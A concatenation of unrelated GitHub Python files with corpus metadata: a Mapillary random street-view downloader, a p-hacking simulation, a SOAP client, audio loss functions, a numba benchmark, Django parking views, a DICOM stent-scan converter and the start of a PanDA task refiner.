                            get_params = {"fileId": googleFile.id, "fields": "*"}
                            get_req = gServiceFiles.get(**get_params)
                            full_file = gFile(get_req.execute())
                            cfg.REMOTE_QUEUE.put(full_file)
            request = gServiceFiles.list_next(request, files_page)
    except HttpError as err:
        logging.error("error scanning google drive files. %s" % str(err))
        print(err)
    except Exception as err:
        logging.error("error scanning google drive files. %s" % str(err))
        print(err)
    return differences
# endregion | k3tchup/google_drive_sync | libgdrive/gDrive.py | gDrive.py | py | 48,013 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "os.path.dirname",
"line_number": 25,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 25,
"usage_type": "attribute"
},
{
"api_name": "os.path.realpath",
"line_number": 25,
"usage_type": "call"
},
{
"api_name": "os.path.dirname",
"... |
28080781134 | """Adapted from:
https://github.com/hugovk/random-street-view/blob/main/random_street_view.py
"""
import argparse
import json
import os
import random
import sys
import requests
from urllib.request import urlopen, urlretrieve
from datetime import datetime
import contextlib
import yaml
import traceback
import shapefile # pip install pyshp
import mapillary.interface as mly # pip install mapillary
# Optional, http://stackoverflow.com/a/1557906/724176
try:
import timing
assert timing # avoid flake8 warning
except ImportError:
pass
# Image file extension used when saving downloads.
IMG_SUFFIX = "jpg"
MAX_TRIES = 10  # Used to set number of maximum attempts at finding a non-filtered image

# Load the Mapillary access token and register it with the SDK.
# NOTE(review): assumes api_key.yaml sits in the working directory and
# contains a 'mly_token' key -- confirm before deploying elsewhere.
with open("api_key.yaml", "r") as ymlfile:
    key = yaml.load(ymlfile, Loader=yaml.FullLoader)
token = key['mly_token']
mly.set_access_token(token)
# Command-line interface.  The long description doubles as usage guidance for
# finding bounding boxes and checking Mapillary coverage.
parser = argparse.ArgumentParser(
    description="Get random Street View images from within the borders of a given country. http://bboxfinder.com may "
    "be helpful for creating box coordinates and https://www.mapillary.com/app may be helpful for checking those boxes "
    "contain any images. By default, images are filtered out if they have any traffic signs as detected by Mapillary's "
    "systems; this should not be trusted absolutely, images should be manually checked for signs.",
    formatter_class=argparse.ArgumentDefaultsHelpFormatter,
)
parser.add_argument("country", help="ISO 3166-1 Alpha-3 Country Code, 'none', or 'near_global'")
help_str = "For default from country borders, enter 0. Ignored if 'near_global'."
# Bounding box: a 0 for any bound means "derive it from the country's borders".
parser.add_argument("min_lon", type=float, help=help_str)
parser.add_argument("min_lat", type=float, help=help_str)
parser.add_argument("max_lon", type=float, help=help_str)
parser.add_argument("max_lat", type=float, help=help_str)
parser.add_argument("-n", "--images-wanted", type=int, default=100, help="Total number of images wanted.")
parser.add_argument("-b", "--burst", type=int, default=10, help="The maximum number of nearby images downloaded from "
                    "any random geographical point that hits. >1 (e.g. 10) is recommended if using 'near_global'. Note "
                    "that nearby images may be captured by the same camera on the same day, so there is a trade-off "
                    "between speed of image retrieval and diversity of images to chosen here. I have so far been "
                    "unable to determine the definition of 'nearby' from the Mapillary SDK documentation, but each "
                    "point hit will often return 100s-1000s of nearby images as shown by '--save-to-json'.")
parser.add_argument("-j", "--save-to-json", action="store_true", help="Save to a JSON file metadata of images found "
                    "near a point.")
parser.add_argument("-N", "--no-filter", action="store_true", help="Turn off filtering of images with traffic signs.")
args = parser.parse_args()

# TODO: "--all-in-box", '-A' mode where every single image in the box is downloaded, not just random ones; ADD A WARNING
if args.images_wanted < 1:
    raise ValueError("Number of images wanted must be at least 1.")
# TODO: Allow for -n 0 for only downloading metadata for images near point (require that -j must also be specified)
# Determine if a point is inside a given polygon or not
# Polygon is a list of (x,y) pairs.
# http://www.ariel.com.au/a/python-point-int-poly.html
def point_inside_polygon(x, y, poly):
    """Ray-casting point-in-polygon test.

    Casts a horizontal ray from (x, y) and toggles 'inside' each time the ray
    crosses a polygon edge; an odd number of crossings means the point lies
    inside.  `poly` is a list of (x, y) vertex pairs.
    Adapted from http://www.ariel.com.au/a/python-point-int-poly.html
    """
    inside = False
    num_vertices = len(poly)
    vx1, vy1 = poly[0]
    for idx in range(num_vertices):
        # edge from the current vertex to the next (wrapping back to vertex 0)
        vx2, vy2 = poly[(idx + 1) % num_vertices]
        if min(vy1, vy2) < y <= max(vy1, vy2) and x <= max(vx1, vx2):
            if vy1 != vy2:
                # x coordinate where the ray crosses this edge
                x_cross = (y - vy1) * (vx2 - vx1) / (vy2 - vy1) + vx1
            if vx1 == vx2 or x <= x_cross:
                inside = not inside
        vx1, vy1 = vx2, vy2
    return inside
print("Loading borders...")
# TM World Borders shapefile: one record per country with its bounding box and
# border polygon (http://thematicmapping.org/downloads/world_borders.php).
shape_file = "TM_WORLD_BORDERS-0.3.shp"
if not os.path.exists(shape_file):
    sys.exit(
        f"Cannot find {shape_file}. Please download it from "
        "http://thematicmapping.org/downloads/world_borders.php and try again."
    )
sf = shapefile.Reader(shape_file, encoding="latin1")
shapes = sf.shapes()

if args.country.lower() == "none":
    # No country filter: the user-supplied bounding box is mandatory.
    if args.min_lon == 0 or args.min_lat == 0 or args.max_lon == 0 or args.max_lat == 0:
        sys.exit("A valid bounding box must be entered if no country is specified.")
    min_lon = args.min_lon
    min_lat = args.min_lat
    max_lon = args.max_lon
    max_lat = args.max_lat
    borders = []
elif args.country.lower() == "near_global":
    # Fixed box covering most of the inhabited world.
    min_lon = -160
    min_lat = -56
    max_lon = 180
    max_lat = 71
    borders = []
else:
    print("Finding country...")
    # Match the requested ISO alpha-3 code.  NOTE(review): the field indices
    # (record[2] = ISO3 code, record[4] = name) are inferred from usage --
    # confirm against the shapefile's field list.
    for i, record in enumerate(sf.records()):
        if record[2] == args.country.upper():
            print(record[2], record[4])
            print(shapes[i].bbox)
            # A 0 for any bound means "use the country's own bounding box".
            min_lon = shapes[i].bbox[0] if args.min_lon == 0 else args.min_lon
            min_lat = shapes[i].bbox[1] if args.min_lat == 0 else args.min_lat
            max_lon = shapes[i].bbox[2] if args.max_lon == 0 else args.max_lon
            max_lat = shapes[i].bbox[3] if args.max_lat == 0 else args.max_lat
            borders = shapes[i].points
            break
print("Getting images...")
# counters for the final stats report
attempts, country_hits, point_hits, point_misses, imagery_hits, imagery_misses, imagery_filtered = 0, 0, 0, 0, 0, 0, 0
dtime = datetime.now().strftime('%Y-%m-%d_%H-%M-%S')
outdir = f"mly_random_{args.country.upper()}_{dtime}"
img_ids = []  # ids already downloaded, so bursts never duplicate an image
try:
    while True:
        attempts += 1
        # sample a uniformly random point in the bounding box
        rand_lat = random.uniform(min_lat, max_lat)
        rand_lon = random.uniform(min_lon, max_lon)
        # Check if (lon, lat) is inside country borders
        point_inside = True
        if borders != []:
            point_inside = point_inside_polygon(rand_lon, rand_lat, borders)
        if point_inside:
            country_hits += 1
            try:
                # We will only retrieve flat images, although the MTSD contains 1138 flattened 360° panorama images
                # NOTE: I couldn't figure out how to suppress the GET prints from the Mapillary SDK
                print()
                images = mly.get_image_close_to(longitude=rand_lon, latitude=rand_lat, image_type='flat',
                                                fields=['thumb_original_url']).to_dict()
                point_hits += 1
            except IndexError:
                # the SDK raises IndexError when nothing is near the point
                point_misses += 1
                print(f"  No images found close to point")
                continue
            hit_dir = f"hits_{args.country.upper()}_{dtime}"
            if args.save_to_json:
                os.makedirs(hit_dir, exist_ok=True)
                with open(os.path.join(hit_dir, f"hit_#{point_hits}_with_{len(images['features'])}_imgs_"
                                                f"{rand_lon}_{rand_lat}.json"), mode="w") as f:
                    json.dump(images, f, indent=4)
            print('\n\n  lat,lon: ' + str(rand_lat) + ',' + str(rand_lon))
            ii = 0     # index into the nearby-image candidates
            found = 0  # images kept from this point
            # take up to args.burst images per point, allowing MAX_TRIES misses
            # per image found before giving up on the point
            while found < args.burst and ii < (found + 1) * MAX_TRIES:
                if ii >= len(images['features']):
                    break
                img_id = images['features'][ii]['properties']['id']
                if img_id in img_ids:
                    # already downloaded from an earlier point
                    imagery_misses += 1
                    ii += 1
                    continue
                url_request = f"https://graph.mapillary.com/{img_id}?access_token={token}&fields=thumb_original_url"
                response = requests.get(url_request).json()  # Query the API for the original image URL
                try:
                    url = response['thumb_original_url']
                except KeyError:
                    print(f"  Error retrieving image URL for {img_id}")
                    imagery_misses += 1
                    ii += 1
                    continue
                # Filter out images with traffic signs detected by Mapillary
                passed_filter = True
                if not args.no_filter:
                    # NOTE: I couldn't figure out how to suppress the GET prints from the Mapillary SDK
                    detections = mly.get_detections_with_image_id(img_id).to_dict()
                    def is_sign(detection):
                        # Mapillary traffic-sign detection values all carry one
                        # of these category prefixes
                        v = detection['properties']['value']
                        return (
                            "complementary" in v or
                            "information" in v or
                            "regulatory" in v or
                            "warning" in v
                        )
                    # BUG FIX: the original used 'if not is_sign(d)', which
                    # collected NON-sign detections and inverted the filter.
                    # We want to skip images containing any sign detection.
                    signs = [d['properties']['value'] for d in detections['features'] if is_sign(d)]
                    if signs != []:
                        imagery_filtered += 1
                        passed_filter = False
                        print("  ----- Skipped image with traffic sign detections -----")
                if passed_filter:
                    os.makedirs(outdir, exist_ok=True)
                    outfile = os.path.join(outdir, f"{img_id}.{IMG_SUFFIX}")
                    try:
                        # Download the image
                        data = requests.get(url)
                        with open(outfile, "wb") as f:
                            f.write(data.content)
                    except KeyboardInterrupt:
                        sys.exit("exit")
                    if os.path.isfile(outfile):
                        print(f"  ========== Got one! Taken from this point: {found + 1} "
                              f"(from {ii + 1} attempts) ==========")
                        img_ids.append(img_id)
                        imagery_hits += 1
                        found += 1
                        if imagery_hits >= args.images_wanted:
                            break
                else:
                    imagery_misses += 1
                ii += 1
            if imagery_hits >= args.images_wanted:
                break
        else:
            # point was outside the country borders; try another one
            pass
except KeyboardInterrupt:
    print("Keyboard interrupt")
except Exception:
    # Make sure that stats are still printed and saved
    traceback.print_exc()

stats_str = f"Attempts:\t{attempts}\n"
if borders != []:
    stats_str += f"Country hits:\t{country_hits}\n"
stats_str += f"Point misses:\t{point_misses}\n"
stats_str += f"Point hits:\t{point_hits}\n"
stats_str += f"Imagery misses:\t{imagery_misses}\n"
if not args.no_filter:
    stats_str += f"Filtered out:\t{imagery_filtered}\n"
stats_str += f"Imagery hits:\t{imagery_hits}"
print(f"\n{stats_str}")
# BUG FIX: outdir is only created once an image is saved; make sure it exists
# before writing the stats file, otherwise a zero-hit run crashes here.
os.makedirs(outdir, exist_ok=True)
with open(os.path.join(outdir, "stats.txt"), mode="w") as f:
    f.write(stats_str)
| BunningsWarehouseOfficial/random-mapillary | random_mapillary.py | random_mapillary.py | py | 10,780 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "yaml.load",
"line_number": 32,
"usage_type": "call"
},
{
"api_name": "yaml.FullLoader",
"line_number": 32,
"usage_type": "attribute"
},
{
"api_name": "mapillary.interface.set_access_token",
"line_number": 34,
"usage_type": "call"
},
{
"api_name": "m... |
36878259269 | import numpy as np
from scipy.stats import ttest_ind
# Simulation of "researcher degrees of freedom": each run tests two correlated
# dependent variables (and their mean) against the same null sample, stopping
# at the first significant result.  The fraction of runs yielding *any*
# p < 0.05 estimates the inflated false-positive rate (nominal rate: 0.05).
np.random.seed(0)  # fixed seed so the simulation is reproducible
# set up simulation parameters
num_simulations = 15000 # number of simulations to run
sample_size = 20 # sample size for each group
mean_1 = 0 # true mean for group 1
std_dev = 1 # standard deviation for both groups
corr = 0.5 # correlation between dependent variables
# generate dependent variables with specified correlation (unit variances)
cov_matrix = np.array([[1, corr], [corr, 1]])
# dependent_vars = np.random.multivariate_normal([0, 0], cov_matrix, size=sample_size)
# initialize lists to store results
p_values = []
# run simulations
for i in range(num_simulations):
    # generate random data for both groups
    group_1 = np.random.multivariate_normal([mean_1, mean_1], cov_matrix, size=sample_size)
    null_hypothesis = np.random.normal(loc=mean_1, scale=std_dev, size=sample_size)
    # this null hypothesis has the same mean and standard deviation as the dependent variables we
    # obtained from multivariate normal distribution
    dep_var1 = group_1[:, 0]
    dep_var2 = group_1[:, 1]
    dep_mean = (dep_var1 + dep_var2) / 2  # third "derived" DV: average of the two
    # calculate t-test p-value for each situation
    # sequential testing: fall through to the next DV only when the previous
    # one was not significant — this is the p-hacking strategy being modeled
    p_value_1 = ttest_ind(dep_var1, null_hypothesis)[1]
    if p_value_1 < 0.05:
        p_values.append(p_value_1)
    else:
        p_value_2 = ttest_ind(dep_var2, null_hypothesis)[1]
        if p_value_2 < 0.05:
            p_values.append(p_value_2)
        else:
            p_value_3 = ttest_ind(dep_mean, null_hypothesis)[1]
            if p_value_3 < 0.05:
                p_values.append(p_value_3)
# print the results
# p_values only holds significant results, so its length over num_simulations
# is the observed false-positive rate under this sequential-testing strategy
print(len(p_values))
print("Percentage of significant results", round(len(p_values) / num_simulations, 3))
| guangyaodou/False-Positive-Psychology-Simulation | situation_A.py | situation_A.py | py | 1,698 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "numpy.random.seed",
"line_number": 4,
"usage_type": "call"
},
{
"api_name": "numpy.random",
"line_number": 4,
"usage_type": "attribute"
},
{
"api_name": "numpy.array",
"line_number": 14,
"usage_type": "call"
},
{
"api_name": "numpy.random.multivaria... |
18033055398 | from zeep.client import Client
import zeep
# Relaxed XML handling: tolerate schema deviations and very large documents.
# NOTE(review): ``settings`` is created but never passed to ``Client`` below —
# presumably it should be ``Client(wsdl, settings=settings)``; confirm intent.
settings = zeep.Settings(strict=False, xml_huge_tree=True)
# Local SOAP endpoint exposing the student web service.
wsdl = 'http://localhost:7000/ws/EstudianteWebServices?wsdl'
cliente = Client(wsdl)
# Fetch the full student list once at import time.
ListEstudiantes = cliente.service.getListaEstudiante()
def consultar(matricula):
    """Look up a single student by matricula via the SOAP service."""
    return cliente.service.getEstudiante(matricula)
def CrearEstudiante(matricula, nombre, carrera):
    """Create a new student record through the SOAP service.

    Returns whatever the remote ``crearEstudiante`` operation returns
    (truthy on success).
    """
    factory = cliente.type_factory('http://soap.eict.pucmm.edu/')
    # BUG FIX: the matricula field was previously populated with the carrera
    # value (``matricula=carrera``), so every student got a wrong matricula.
    nuevoEstudiante = factory.estudiante(carrera=carrera, matricula=matricula, nombre=nombre)
    creado = cliente.service.crearEstudiante(nuevoEstudiante)
    return creado
def EliminarEstudiante(matricula):
    """Delete the student with the given matricula; returns the service result
    (truthy when the deletion succeeded)."""
    return cliente.service.eliminarEstudiante(matricula)
print("[INFO] LISTA DE ESTUDIANTES: ")
for est in ListEstudiantes:
print('[Nombre]: ' + est.nombre + ' [Matricula]: ' + str(est.matricula))
print('[INFO] Ingrese matricula del Estudiante que desea consultar: {DEFAULT= 20011136} \n')
id = input()
print('[INFO] ESTUDIANTE CONSULTADO: \n' + str(consultar(matricula=id)))
print('[INFO] Ingrese Información del Nuevo Estudiante que desea CREAR: ')
print('[CARRERA]: ')
carrera = input()
print('[matricula]: ')
matricula = input()
print('[nombre]: ')
nombre = input()
print('[INFO] ESTUDIANTE CREADO: ' + str(CrearEstudiante(matricula=matricula,nombre=nombre,carrera=carrera)))
print('[INFO] Matricular del Estudiante que desea ELIMINAR: ')
id = input()
if(EliminarEstudiante(matricula=id)):
print('[INFO] ESTUDIANTE Eliminado!')
print('~(^_^)~ --[HAPPY CODING!!]-- ~(^_^)~ ')
| AndoRoman/Client-SOAP | Main.py | Main.py | py | 1,574 | python | es | code | 0 | github-code | 1 | [
{
"api_name": "zeep.Settings",
"line_number": 4,
"usage_type": "call"
},
{
"api_name": "zeep.client.Client",
"line_number": 6,
"usage_type": "call"
}
] |
17824878888 | import torch.nn.functional as F
import torch
import numpy as np
def mae(input, target):
    """Mean absolute error between two tensors (scalar tensor result)."""
    return (input - target).abs().mean()
def logmae_wav(model, output_dict, target):
    """Log10 of the MAE between the predicted waveform and the target.

    The MAE is clamped to at least 1e-8 so the logarithm stays finite.
    (``model`` is unused; kept for the shared loss-function signature.)
    """
    err = mae(output_dict['wav'], target)
    return torch.log10(torch.clamp(err, 1e-8, np.inf))
def max_si_snr(input, target, eps = 1e-8):
    """Negative scale-invariant SNR (SI-SNR) loss.

    Args:
        input: estimated signal, shape [B, C, T].
        target: reference signal, shape [B, C, T].
        eps: numerical floor to avoid division by / log of zero.

    Returns:
        Scalar tensor: the negated mean SI-SNR (lower is better).
    """
    assert input.size() == target.size()
    T = target.size(2)
    # Zero-mean both signals along time; SI-SNR is defined on mean-removed signals.
    zero_mean_target = target - torch.sum(target, dim = 2, keepdim=True) / T
    zero_mean_input = input - torch.sum(input, dim = 2, keepdim=True) / T
    # Broadcast so every input channel is compared against every target channel:
    # s_target is [B, 1, C, T], s_input is [B, C, 1, T].
    s_target = torch.unsqueeze(zero_mean_target, dim = 1)
    s_input = torch.unsqueeze(zero_mean_input, dim = 2)
    # Project the input onto the target direction.
    pair_wise_dot = torch.sum(s_input * s_target, dim = 3, keepdim=True)
    s_target_energy = torch.sum(s_target ** 2, dim = 3, keepdim=True)
    pair_wise_proj = pair_wise_dot * s_target / s_target_energy
    # Residual (noise) component orthogonal to the target.
    e_noise = s_input - pair_wise_proj
    pair_wise_si_snr = torch.sum(pair_wise_proj ** 2, dim = 3) / (torch.sum(e_noise ** 2, dim = 3) + eps)
    pair_wise_si_snr = 10 * torch.log10(pair_wise_si_snr + eps)
    # Negate: training minimizes this loss, which maximizes SI-SNR.
    return 0 - torch.mean(pair_wise_si_snr.squeeze(1).squeeze(1))
def get_loss_func(loss_type):
    """Map a loss-type name to its callable.

    Supported names: 'logmae_wav', 'mae', 'si_snr', 'mse'.
    Raises ``Exception`` for any other name.
    """
    if loss_type == 'mse':
        return torch.nn.MSELoss()
    if loss_type == 'si_snr':
        return max_si_snr
    if loss_type == 'mae':
        return mae
    if loss_type == 'logmae_wav':
        return logmae_wav
    raise Exception('Incorrect loss_type!')
{
"api_name": "torch.mean",
"line_number": 7,
"usage_type": "call"
},
{
"api_name": "torch.abs",
"line_number": 7,
"usage_type": "call"
},
{
"api_name": "torch.log10",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "torch.clamp",
"line_number": 11,
... |
70521367394 | # -*- coding: utf-8 -*-
"""
A new file.
"""
import numpy as np
from numba import jit, vectorize
from utils import timeit
from loops import loop1
@timeit
def loop(m, n):
    """Pure-Python reference: sum of 1/i + 1/j over the m x n grid."""
    return sum(1.0 / i + 1.0 / j
               for i in range(1, m + 1)
               for j in range(1, n + 1))
@timeit
def loopcxx(m, n):
    # Same computation delegated to the compiled extension (see loops.loop1).
    return loop1(m, n)
@timeit
@jit
def loop_jit(m, n):
    # Identical to ``loop`` but JIT-compiled by numba: the first call pays the
    # compilation cost, subsequent calls run as native code.
    s = 0
    for i in range(1, m + 1):
        for j in range(1, n + 1):
            s += 1.0 / i + 1.0 / j
    return s
@timeit
@vectorize(['float64(int64, int64)'])
def loop_vec(m, n):
    # numba ufunc version of the same loop body, compiled for int64 inputs.
    # NOTE(review): called with scalar m, n in main(), so it presumably acts
    # as a compiled scalar function here — confirm against numba docs.
    s = 0
    for i in range(1, m + 1):
        for j in range(1, n + 1):
            s += 1.0 / i + 1.0 / j
    return s
def main():
    """Run all four implementations on the same inputs and print the results."""
    m, n = 10000, 1000
    results = (loop(m, n), loopcxx(m, n), loop_jit(m, n), loop_vec(m, n))
    print(*results)
if __name__ == '__main__':
    # Script entry point: announce start, then run the benchmark comparison.
    print('running...')
    main()
| cmjdxy/fundamental-demos | study-parallel-computing/jit_vs_vec.py | jit_vs_vec.py | py | 983 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "utils.timeit",
"line_number": 12,
"usage_type": "name"
},
{
"api_name": "loops.loop1",
"line_number": 23,
"usage_type": "call"
},
{
"api_name": "utils.timeit",
"line_number": 21,
"usage_type": "name"
},
{
"api_name": "utils.timeit",
"line_number... |
37932432698 | from kivymd.uix.button import MDIconButton
from kivy.app import App
from kivy.properties import (
AliasProperty,
BooleanProperty,
ListProperty,
NumericProperty,
ObjectProperty,
StringProperty,
)
class MDIconButtonTwoPosition(MDIconButton):
    """Icon button that toggles between an enabled and a disabled state.

    Each release flips ``enabled``, swaps the icon between ``sourceEnabled``
    and ``sourceDisabled``, and — when set — invokes ``triggerFunction`` with
    ``arguments`` and the new state.
    """

    # Current toggle state (class-level default; becomes per-instance on the
    # first assignment in on_release).
    enabled = True
    # Icon names for the two states.
    sourceEnabled = StringProperty()
    sourceDisabled = StringProperty()
    # Optional callback fired after every toggle: triggerFunction(arguments, enabled)
    triggerFunction = ObjectProperty()
    arguments = ObjectProperty()

    def on_release(self):
        # Idiomatic toggle (was an explicit ``== True`` if/else chain).
        self.enabled = not self.enabled
        self.change_source()
        if self.triggerFunction is not None:
            self.triggerFunction(self.arguments, self.enabled)

    def change_source(self):
        # Reflect the current state in the displayed icon.
        self.icon = self.sourceEnabled if self.enabled else self.sourceDisabled
{
"api_name": "kivymd.uix.button.MDIconButton",
"line_number": 12,
"usage_type": "name"
},
{
"api_name": "kivy.properties.StringProperty",
"line_number": 14,
"usage_type": "call"
},
{
"api_name": "kivy.properties.StringProperty",
"line_number": 15,
"usage_type": "call"
... |
40173689508 | from django.shortcuts import render, redirect
from django.http import JsonResponse
from django.views.decorators.csrf import csrf_exempt
from .models import *
from realtime.models import InAndOut
from .decorators import user_required, get_park_time
'''用户端 - 我的'''
@user_required
def personal(request, user):
    """Render the personal ("my") landing page for the logged-in user."""
    ctx = { 'menu': 'personal'}
    # NOTE(review): debug print of the user's avatar URL — consider removing.
    print(user.wechat_user().head_img)
    ctx['user'] = user
    return render(request, 'public_count/personal/my.html', ctx)
@user_required
def mybill(request, user, id=None):
    """Bill list page; when ``id`` is given, show the detail page for one record."""
    ctx = {}
    if id:
        ctx['r'] = r = InAndOut.objects.filter(id=id).first()
        if r:
            # hours1: in_time -> out_time; hours2: out_time -> final_out_time.
            # Assumes these are the parked and post-payment grace durations —
            # TODO confirm against the InAndOut model.
            ctx['hours1'] = get_park_time(r.in_time, r.out_time)
            ctx['hours2'] = get_park_time(r.out_time, r.final_out_time)
        return render(request, 'public_count/personal/bill-detail.html', ctx)
    return render(request, 'public_count/personal/mybill.html', ctx)
@user_required
def mycard(request, user):
    """Show the parking cards attached to any of the user's bound plates."""
    ctx = {}
    from chargerule.models import Card  # local import, presumably to avoid a circular import
    plates = MyPlate.objects.filter(user=user)
    plates = [i.plate for i in plates]
    if plates:
        # Cards are matched by car number against the user's bound plates.
        ctx['cards'] = Card.objects.filter(car_number__in=plates)
    return render(request, 'public_count/personal/mycard.html', ctx)
@user_required
def mycoupon(request, user):
    """Render the coupon page (no context data is supplied here)."""
    return render(request, 'public_count/personal/mycoupon.html', {})
@user_required
def myplate(request, user):
    """List the user's bound plates; POST binds ('bound') or unbinds ('unbound') one."""
    ctx = {}
    plates = MyPlate.objects.filter(user=user)
    if request.method == 'POST':
        action = request.POST.get('action')
        if action == 'bound':
            # Bind a new plate (idempotent thanks to get_or_create).
            plate = request.POST.get('plate', '')
            MyPlate.objects.get_or_create(user=user, plate=plate)
        elif action == 'unbound':
            # Unbind by MyPlate row id.
            id = request.POST.get('id', '')
            MyPlate.objects.filter(id=id).delete()
        # Redirect after POST so a refresh does not repeat the action.
        return redirect('/wechat/personal/myplate/')
    ctx['plates'] = plates
    return render(request, 'public_count/personal/myplate.html', ctx)
@user_required
def bound(request, user):
    """Render the plate-binding page."""
    return render(request, 'public_count/personal/bound.html')
@user_required
def problem(request, user):
    """Problem-report page; POST files a report for a plate / parking lot / gate."""
    if request.method == 'POST':
        car_number = request.POST.get('car_number', '')
        gate_id = request.POST.get('gate', '')
        parkinglot_id = request.POST.get('parkinglot', '')
        p = Problem(user=user, plate=car_number, parkinglot_id=parkinglot_id)
        if gate_id:
            # Gate is optional; only set when the client supplied one.
            p.gate_id = gate_id
        p.save()
    return render(request, 'public_count/problem.html')
@user_required
def scan_coupon(request, user, id, code):
    """Redeem a coupon QR code.

    ``id`` identifies the TicketRecord and ``code`` is the one-time random
    token embedded in the QR.  On a match the token is rotated (so the same
    QR cannot be scanned twice) and a UserCoupon is issued to ``user``.
    """
    from chargerule.models import TicketRecord, UserCoupon
    ctx = {}
    r = TicketRecord.objects.filter(id=id).first()
    if r is not None:
        if r.qrrandom == code:
            from business.views import ran
            # Rotate the token before issuing so the QR becomes single-use.
            r.qrrandom = ran()
            r.save()
            # BUG FIX: ``r`` is already a TicketRecord instance here; the old
            # code passed ``ticket_record=r.first()``, which raised AttributeError.
            UserCoupon.objects.create(user=user, ticket_record=r)
        else:
            ctx['error'] = '二维码已过期'
    # NOTE(review): ``coupons`` is computed but never passed to the template;
    # kept for parity with the original — confirm whether the template needs it.
    coupons = UserCoupon.objects.select_related('ticket_record', 'ticket_record__coupons').filter(status=0).order_by('-create_time')
    return render(request, 'public_count/personal/mycoupon.html', ctx)
| codefish-yu/parking | parking/wechat/my.py | my.py | py | 2,952 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "django.shortcuts.render",
"line_number": 21,
"usage_type": "call"
},
{
"api_name": "decorators.user_required",
"line_number": 15,
"usage_type": "name"
},
{
"api_name": "realtime.models.InAndOut.objects.filter",
"line_number": 29,
"usage_type": "call"
},
... |
30298059185 |
class Nellix2ssdf:
    """Convert a 10-phase ECG-gated DICOM series to cropped SSDF volumes.

    Reads the dynamic CT phases from ``dicom_basedir``, orders them by the
    phase percentage encoded in the DICOM SeriesDescription, saves cropped
    volumes under ``basedir`` and shows a MIP rendering of the 40% phase.
    (Removed: large blocks of dead, commented-out alternative code paths.)
    """

    def __init__(self, dicom_basedir, ptcode, ctcode, basedir):
        import imageio
        from stentseg.utils.datahandling import loadvol
        from stentseg.utils.datahandling import savecropvols, saveaveraged

        print('DICOM Path = ', dicom_basedir)
        stenttype = 'nellix'
        print('Base Path = ', basedir)
        # Set which crops to save, e.g. ['ring'] or ['ring', 'stent'].
        cropnames = ['prox']

        ## Step A: read the 10 cardiac phases.
        # The reader yields phase volumes in arbitrary order; the leading digit
        # of SeriesDescription ('0%', '10%', ...) fixes the ordering.
        vols2 = [vol2 for vol2 in imageio.get_reader(dicom_basedir, 'DICOM', 'V')]
        vols = [None] * len(vols2)
        for i, vol in enumerate(vols2):
            print(vol.meta.SeriesDescription)
            phase = int(vol.meta.SeriesDescription[:1])
            # use phase to fix order of phases
            vols[phase] = vol

        # Sanity check: identical shapes and descriptions in 0%..90% order.
        for i, vol in enumerate(vols):
            print(vol.meta.SeriesDescription)
            assert vol.shape == vols[0].shape
            assert str(i * 10) in vol.meta.SeriesDescription  # 0% , 10% etc.

        ## Step B: crop and save SSDF (crop with margins of at least 30 mm).
        for cropname in cropnames:
            savecropvols(vols, basedir, ptcode, ctcode, cropname, stenttype)

        ## Visualize result: load the saved phases and render the 40% phase.
        s1 = loadvol(basedir, ptcode, ctcode, cropnames[0], what='phases')
        vol1 = s1.vol40

        import visvis as vv
        fig = vv.figure(1); vv.clf()
        fig.position = 0, 22, 1366, 706
        a1 = vv.subplot(111)
        a1.daspect = 1, 1, -1
        a1 = vv.volshow2(vol1, clim=(-500, 1500), renderStyle='mip')
        vv.xlabel('x'), vv.ylabel('y'), vv.zlabel('z')
        vv.title('Vol40')
| almarklein/stentseg | nellix/nellix2ssdf.py | nellix2ssdf.py | py | 5,174 | python | en | code | 3 | github-code | 1 | [
{
"api_name": "imageio.get_reader",
"line_number": 73,
"usage_type": "call"
},
{
"api_name": "stentseg.utils.datahandling.savecropvols",
"line_number": 93,
"usage_type": "call"
},
{
"api_name": "stentseg.utils.datahandling.loadvol",
"line_number": 100,
"usage_type": "call... |
7455827350 | import datetime
import sys
import time
import traceback
# logger
from pandacommon.pandalogger.PandaLogger import PandaLogger
from pandajedi.jediconfig import jedi_config
from pandajedi.jedicore import Interaction, JediException
from pandajedi.jedicore.FactoryBase import FactoryBase
from pandajedi.jedicore.JediDatasetSpec import JediDatasetSpec
from pandajedi.jedicore.JediTaskSpec import JediTaskSpec
from pandajedi.jedicore.MsgWrapper import MsgWrapper
from pandajedi.jedicore.ThreadUtils import ListWithLock, ThreadPool, WorkerThread
from pandajedi.jedirefine import RefinerUtils
from .JediKnight import JediKnight
logger = PandaLogger().getLogger(__name__.split(".")[-1])
# worker class to refine TASK_PARAM to fill JEDI tables
class TaskRefiner(JediKnight, FactoryBase):
    """Agent that polls for tasks to refine and fans the work out to threads."""

    # constructor
    def __init__(self, commuChannel, taskBufferIF, ddmIF, vos, prodSourceLabels):
        # vos / prodSourceLabels arrive as strings; parseInit turns them into lists
        self.vos = self.parseInit(vos)
        self.prodSourceLabels = self.parseInit(prodSourceLabels)
        JediKnight.__init__(self, commuChannel, taskBufferIF, ddmIF, logger)
        FactoryBase.__init__(self, self.vos, self.prodSourceLabels, logger, jedi_config.taskrefine.modConfig)

    # main
    def start(self):
        """Main loop: fetch tasks to refine per (vo, label) and process them with a pool."""
        # start base classes
        JediKnight.start(self)
        FactoryBase.initializeMods(self, self.taskBufferIF, self.ddmIF)
        # go into main loop
        while True:
            startTime = datetime.datetime.utcnow()
            try:
                # get logger
                tmpLog = MsgWrapper(logger)
                tmpLog.debug("start")
                # loop over all vos
                for vo in self.vos:
                    # loop over all sourceLabels
                    for prodSourceLabel in self.prodSourceLabels:
                        # get the list of tasks to refine
                        tmpList = self.taskBufferIF.getTasksToRefine_JEDI(vo, prodSourceLabel)
                        if tmpList is None:
                            # failed
                            tmpLog.error("failed to get the list of tasks to refine")
                        else:
                            tmpLog.debug(f"got {len(tmpList)} tasks")
                            # put to a locked list so worker threads can pop safely
                            taskList = ListWithLock(tmpList)
                            # make thread pool
                            threadPool = ThreadPool()
                            # get work queue mapper
                            workQueueMapper = self.taskBufferIF.getWorkQueueMap()
                            # make workers
                            nWorker = jedi_config.taskrefine.nWorkers
                            for iWorker in range(nWorker):
                                thr = TaskRefinerThread(taskList, threadPool, self.taskBufferIF, self.ddmIF, self, workQueueMapper)
                                thr.start()
                            # join
                            threadPool.join()
            except Exception:
